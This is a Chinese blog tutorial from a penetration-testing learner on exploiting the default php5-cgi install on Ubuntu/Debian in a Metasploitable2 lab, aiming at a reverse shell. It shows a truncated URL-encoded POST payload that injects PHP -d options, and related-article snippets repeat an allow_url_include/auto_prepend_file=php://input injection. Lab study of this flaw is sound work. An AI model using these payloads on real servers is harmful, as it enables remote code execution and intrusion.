手动漏洞挖掘 Ubuntu / Debian 默认安装php5-cgi

最新推荐文章于 2024-01-12 09:30:00 发布
最新推荐文章于 2024-01-12 09:30:00 发布
阅读量811 收藏 2
点赞数 1
分类专栏: # 网安—手动漏洞挖掘 文章标签: kali php web渗透 php5-cgi 漏洞挖掘
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44867435/article/details/99292635
版权

手动漏洞挖掘(二)

学习web渗透过程中的心得体会以及知识点的整理,方便我自己查找,也希望可以和大家一起交流。

——Ubuntu / Debian 默认安装漏洞——

需要的工具:

  1. burpsuit
  2. 靶机(我选择的是Metasploitable2)

Ubuntu / Debian 默认安装php5-cgi漏洞
Ubuntu和Debian是两个Linux操作系统,由于他们两个会默认安装php5-cgi,目录在/cgi-bin/php5和/cgi-bin/php,因为其不在/var/www目录下,所以这两个目录大部分自动扫描软件无法爬取。

一.漏洞测试
通过网页利用php回弹shell到攻击地址

首先我们输入如下代码:

     POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%6
最低0.47元/天 解锁文章
胡乱huluan
关注
专栏目录
如果你使用 Ubuntu or Debian, 安装 libgtk2.0-dev 以及 pkg-config
Pleadge的博客
07-25 2043
这里写自定义If you are on Ubuntu or Debian, install libgtk2.0-dev and pkg-config目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导
install lighttpd and php5-cgi on ubuntu
weixin_30478757的博客
07-22 55
http://www.nokarma.de/2007/1/22/ubuntu-lighttpd-and-php5-cgi 转载于:https://www.cnblogs.com/fanweixiao/archive/2008/05/29/1209577.html
PHP5模块和CGI
httpnet的专栏
02-08 4227
    把PHP5作为CGI安装是一个快速运行PHP5的方法,并且不必修改PHP4的配置。    另外一个不必修改PHP4的配置用同时获得完全的PHP5功能的方法是把PHP5设置在apache的另外一个端口上监听来自客户端的请求。比如apache的8080端口。这样就可以在80端口上处理PHP4脚本,在8080端口上处理PHP5的面向对象的脚本,一举两得。    记住CGI安装方式与模块安装方式相
PHP三种运行方式mod_php5/cgi/fast-cgi
Lankecms
05-31 2121
1. PHP三种运行方式mod_php5/cgi/fast-cgi 1.1. a.通过HTTPServer内置的模块来实现, 例如Apache的mod_php5,类似的Apache内置的mod_perl可以对perl支持; 1.2. b.通过CGI来实现 这个就好比之前perl的CGI,该种方式的缺点是性能差,因为每次服务器遇到这些脚本都需要重新启动脚本解析器来执行脚本然后
kali php5cgi,ubuntu上配置Nginx+PHP5 FastCGI服务器配置
weixin_42116585的博客
03-23 211
首先安装或编译Nginx。安装Nginx源码包可以在官方主页上下载。Ubuntu 9.04可以直接通过apt安装,也可以从这里下载最新的deb包:sudo apt-get install nginx如果要自己编译的话,需要确保自己已经有编译器和PCRE的库(用于Nginx的rewrite模块,如果不需要这个模块可以在configure时使用./configure –without-rewrite)...
怎么下载php5-cgi_php 5.3.10 fast-cgi安装
weixin_28985877的博客
03-08 272
wgettar -zxvf php-5.3.10.tar.gzcd php-5.3.10./configure --prefix=/usr/local/php5310 --with-config-file-path=/usr/local/php5310/etc --with-mysql=/usr/local/mysql --with-mysqli=/usr/local/mysql/bin/mysq...
If you are on Ubuntu or Debian, install libgtk2.0-dev and pkg-config解决失败
weixin_44991673的博客
05-12 3504
If you are on Ubuntu or Debian, install libgtk2.0-dev and pkg-config terminate called after throwing an instance of 'cv::Exception' what(): OpenCV(3.4.5) /home/user/thirdLibrary/opencv/opencv-3.4.5/modules/highgui/src/window.cpp:617: error: (-2:Unspecif
W: GPG 错误:file:/var/cuda-repo-ubuntu2004-11-1-local Release: 由于没有公钥,无法验证下列签名: NO_PUBKEY F60F4B3D7FA
weixin_45532178的博客
04-03 7382
记录一下学习 今天安装cuda11.1的时候 在解压包的时候遇到的问题。 W: GPG 错误:file:/var/cuda-repo-ubuntu2004-11-1-local Release: 由于没有公钥,无法验证下列签名: NO_PUBKEY F60F4B3D7FA2AF80 E: 仓库 “file:/var/cuda-repo-ubuntu2004-11-1-local Release” 没有数字签名。 N: 无法安全地用该源进行更新,所以默认禁用该源。 N: 参见 apt-secure(8)
ubuntu/debian安装最新版docker和docker-compose
个人博客
10-10 2904
ubuntu/debian安装docker的方法有很多。 最传统的方法是自己手动添加密钥,然后进行安装。 curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - add-apt-repository "deb [arch=amd64] https://download.docker.com/lin...
ubuntu 12.04 编译、安装PHP
半盏黄粱
01-22 638
解压后 sudo ./configure --prefix=/usr/local/development/php --with-mysql=/etc/mysql --with-apxs2=/usr/local/development/http-2.4.2/bin/apxs --with-config-file-path=/usr/local/development/php/etc (其中,--
debian安装切换apache到nginx,php5-fpm和spawn-cgi运行php
rainysia的专栏
10-23 7903
1:前言  以前debian作开发机server是apache,工作需要切换到nginx,有时候两个都要使用。作个简单的笔记。注意,本文仅仅是在debian 7(wheezy) 上。其它OS有其它OS的配置和安装,不能保证一致性。apache的安装配置就参考前面发的文章了。 2:安装 nginx  php5-cgi php5-fpm spawn-fcgi  #apt-get inst
debian编译安装php5.5,Debian/Ubuntu 从源码编译安装 PHP 5
weixin_42510805的博客
03-17 308
三、编译安装 PHP 53.1、编译安装 LibXMLwget http://xmlsoft.org/sources/libxml2-2.7.8.tar.gztar -zxf libxml2-2.7.8.tar.gzcd libxml2-2.7.8./configure --prefix=/usr/localmake && make install3.2、编译安装 Mhashwge...
debian下快速搭建php环境并验证
最新发布
空山新雨后,天气晚来秋
01-12 409
debian下快速搭建php环境并验证
cgi-bin php,centos7 – 如何从cgi-bin / php POST请求攻击中保护服务器
weixin_42116847的博客
03-10 776
我们向服务器发出POST请求,其中包含以下内容:%63%67%69%2D%62%69%6E/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%...
apt-get 与 dpkg
木木
05-21 2960
apt-get 是从软件仓库中获取软件的一条命令。apt-get 之于 Ubuntu 操作系统,pip 之于 Python,加载第三方的软件(包)方式(在线下载安装托管在某一仓库中的文件)都是一致的。 1. apt-get 彻底删除 sudo apt-get remove --purge ** 获取包的源码 sudo apt-get source -f:–fix-broken 更新源列表: s...
CGI漏洞攻击手册
蓝法典的专栏
03-20 9399
在论坛里看到过bamboo写的CGI漏洞利用的文章,我就想把他扩大一些.一直想完善一些再贴上来,但我并没有机会和时间试过所有漏洞,想到论坛里还有那么多同志会来完善的,就取名CGI漏洞攻击手册version-0.02(升级了bamboo的),旨在抛砖引玉,欢迎任意修改,增加...更欢迎任意散播.:)一. phf漏洞这个phf漏洞好象是最经典了,几乎所有的文章都会介绍,可以执行服务器的命令,如显示/e
CGI接口原理及实现
热门推荐
chuanzhilong的博客
10-20 1万+
CGI接口原理及实现   CGI接口原理及实现(2012-12-7 Over)      1.CGI定义:   CGI(CommonGateway Interface)是HTTP服务器与你的或其它机器上的程序进行“交谈”的一种工具,其程序须运行在网络服务器上。   2.CGI功能:   绝大多数的CGI程序被用来解释处理来自表单的输入信息,并在服务器产生相应
kali linux之手动漏洞挖掘
weixin_30632883的博客
02-28 342
默认安装漏洞 phpmyadmin/setup默认安装 ubuntu/debian默认安装php5-cgi phpmyadmin/setup默认安装 使用?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1对php.ini文件做试探) POSThttp://192.168.1.12/ph...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值